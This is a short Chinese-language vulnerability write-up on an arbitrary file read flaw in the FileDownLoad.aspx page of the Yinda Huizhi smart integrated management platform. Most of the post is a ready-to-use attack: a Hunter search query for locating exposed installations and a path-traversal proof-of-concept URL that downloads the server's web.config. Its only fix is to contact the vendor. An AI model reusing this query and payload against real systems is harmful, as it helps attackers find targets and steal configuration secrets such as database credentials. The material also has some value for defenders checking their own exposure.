【漏洞复现】银达汇智智慧综合管理平台任意文件读取漏洞

Nx01 产品简介

? ? ? ? 福建银达汇智信息科技股份有限公司成立于2009年，位于福建省福州市，是一家以从事软件和信息技术服务业为主的企业。

Nx02 漏洞描述

????????银达汇智智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞，通过漏洞攻击者可下载服务器中的任意文件。

Nx03 产品主页

hunter-query: "汇智信息" && title=="智慧综合管理平台登入"

Nx04 漏洞复现

POC：

/Module/FileManagement/FileDownLoad.aspx?filePath=../../web.config

Nx05 修复建议

建议联系软件厂商进行处理。